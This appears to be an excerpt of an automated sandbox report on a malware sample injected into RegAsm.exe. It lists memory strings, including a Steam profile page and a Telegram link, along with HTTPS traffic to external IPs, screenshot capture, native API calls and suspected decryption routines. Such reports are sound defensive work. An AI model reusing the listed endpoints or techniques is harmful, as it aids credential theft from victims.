Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/explore/
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/legal/
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/mobile
Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/news/
Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/stats/
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: IIJDBGDGCGDAKFIDGIDBFIEHDH.3.dr	String found in binary or memory: https://support.mozilla.org
Source: IIJDBGDGCGDAKFIDGIDBFIEHDH.3.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: IIJDBGDGCGDAKFIDGIDBFIEHDH.3.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, EGIDAAFI.3.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: EGIDAAFI.3.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, EGIDAAFI.3.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: EGIDAAFI.3.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
Source: file.exe, 00000000.00000002.1702569185.0000000003EC5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/sa9ok
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: ECFHIJKJ.3.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: ECFHIJKJ.3.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: IIJDBGDGCGDAKFIDGIDBFIEHDH.3.dr	String found in binary or memory: https://www.mozilla.org
Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: IIJDBGDGCGDAKFIDGIDBFIEHDH.3.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/ost.exe
Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: IIJDBGDGCGDAKFIDGIDBFIEHDH.3.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/xe
Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: IIJDBGDGCGDAKFIDGIDBFIEHDH.3.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
Source: IIJDBGDGCGDAKFIDGIDBFIEHDH.3.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
Source: IIJDBGDGCGDAKFIDGIDBFIEHDH.3.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746

Source: unknown	HTTPS traffic detected: 104.112.44.153:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 78.46.229.36:443 -> 192.168.2.4:49732 version: TLS 1.2

Contains functionality to record screenshots

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00411BD0 memset,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

3_2_00411BD0

System Summary

.NET source code contains very large array initializations

Source: file.exe, RemoteObjects.cs

Large array initialization: RemoteObjects: array initializer size 208384

Contains functionality to call native functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6FED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,	3_2_6C6FED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C73B8C0 rand_s,NtQueryVirtualMemory,	3_2_6C73B8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C73B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	3_2_6C73B910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C73B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	3_2_6C73B700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6DF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	3_2_6C6DF280

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02D30EEF	0_2_02D30EEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041F0F0	3_2_0041F0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041CA69	3_2_0041CA69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041DBE7	3_2_0041DBE7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041CFBA	3_2_0041CFBA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6D35A0	3_2_6C6D35A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C715C10	3_2_6C715C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C74AC00	3_2_6C74AC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C716CF0	3_2_6C716CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6E6C80	3_2_6C6E6C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6EFD00	3_2_6C6EFD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6FED10	3_2_6C6FED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C710DD0	3_2_6C710DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C746E63	3_2_6C746E63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C713E50	3_2_6C713E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C722E4E	3_2_6C722E4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6F9E50	3_2_6C6F9E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C739E30	3_2_6C739E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C717E10	3_2_6C717E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6DBEF0	3_2_6C6DBEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6EFEF0	3_2_6C6EFEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C734EA0	3_2_6C734EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6F5E90	3_2_6C6F5E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6E9F00	3_2_6C6E9F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C706FF0	3_2_6C706FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6DDFE0	3_2_6C6DDFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6F8850	3_2_6C6F8850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6FD850	3_2_6C6FD850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C71B820	3_2_6C71B820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C724820	3_2_6C724820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6E7810	3_2_6C6E7810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7158E0	3_2_6C7158E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C72B970	3_2_6C72B970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6ED960	3_2_6C6ED960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6FA940	3_2_6C6FA940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C70D9B0	3_2_6C70D9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6DC9A0	3_2_6C6DC9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C732990	3_2_6C732990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C719A60	3_2_6C719A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6F1AF0	3_2_6C6F1AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C718AC0	3_2_6C718AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C742AB0	3_2_6C742AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C704AA0	3_2_6C704AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6ECAB0	3_2_6C6ECAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C74BA90	3_2_6C74BA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6E5477	3_2_6C6E5477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C74545C	3_2_6C74545C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C74542B	3_2_6C74542B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6DD4E0	3_2_6C6DD4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6E64C0	3_2_6C6E64C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6FD4D0	3_2_6C6FD4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7334A0	3_2_6C7334A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C73C4A0	3_2_6C73C4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C700512	3_2_6C700512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7385F0	3_2_6C7385F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6DC670	3_2_6C6DC670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6F4640	3_2_6C6F4640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C725600	3_2_6C725600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7476E3	3_2_6C7476E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C73E680	3_2_6C73E680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C717710	3_2_6C717710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7277A0	3_2_6C7277A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C71F070	3_2_6C71F070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6FC0E0	3_2_6C6FC0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7450C7	3_2_6C7450C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7060A0	3_2_6C7060A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C74B170	3_2_6C74B170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C715190	3_2_6C715190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C71E2F0	3_2_6C71E2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6D22A0	3_2_6C6D22A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6EC370	3_2_6C6EC370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6D5340	3_2_6C6D5340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7453C8	3_2_6C7453C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6DF380	3_2_6C6DF380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7FAC60	3_2_6C7FAC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C84ECD0	3_2_6C84ECD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8B6C00	3_2_6C8B6C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8CAC30	3_2_6C8CAC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7EECC0	3_2_6C7EECC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C886D90	3_2_6C886D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C97CDC0	3_2_6C97CDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C978D20	3_2_6C978D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C91AD50	3_2_6C91AD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7F4DB0	3_2_6C7F4DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8BED70	3_2_6C8BED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C876E90	3_2_6C876E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C890EC0	3_2_6C890EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8D0E20	3_2_6C8D0E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7FAEC0	3_2_6C7FAEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C88EE70	3_2_6C88EE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C938FB0	3_2_6C938FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7F6F10	3_2_6C7F6F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8CEFF0	3_2_6C8CEFF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7F0FE0	3_2_6C7F0FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C930F20	3_2_6C930F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C85EF40	3_2_6C85EF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7FEFB0	3_2_6C7FEFB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8B2F70	3_2_6C8B2F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8DC8C0	3_2_6C8DC8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8F68E0	3_2_6C8F68E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C840820	3_2_6C840820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C87A820	3_2_6C87A820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8C4840	3_2_6C8C4840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8809A0	3_2_6C8809A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8AA9A0	3_2_6C8AA9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8B09B0	3_2_6C8B09B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C90C9E0	3_2_6C90C9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8249F0	3_2_6C8249F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C846900	3_2_6C846900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C828960	3_2_6C828960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C86EA80	3_2_6C86EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C89EA00	3_2_6C89EA00

Found potential string decryption / allocating functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00402290 appears 286 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C9709D0 appears 99 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C7194D0 appears 88 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C70CBE8 appears 134 times

One or more processes crash

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7472 -s 932

PE / OLE file has an invalid certificate

Source: file.exe

Static PE information: invalid certificate

Sample file is different than original file name gathered from version info

Source: file.exe, 00000000.00000002.1701772300.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFriendly.exe4 vs file.exe
Source: file.exe, 00000000.00000002.1701210814.000000000103E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe, 00000000.00000000.1613149582.0000000000C5A000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameFriendly.exe4 vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameFriendly.exe4 vs file.exe

Tries to load missing DLLs

Source: C:\Users\user\Desktop\file.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
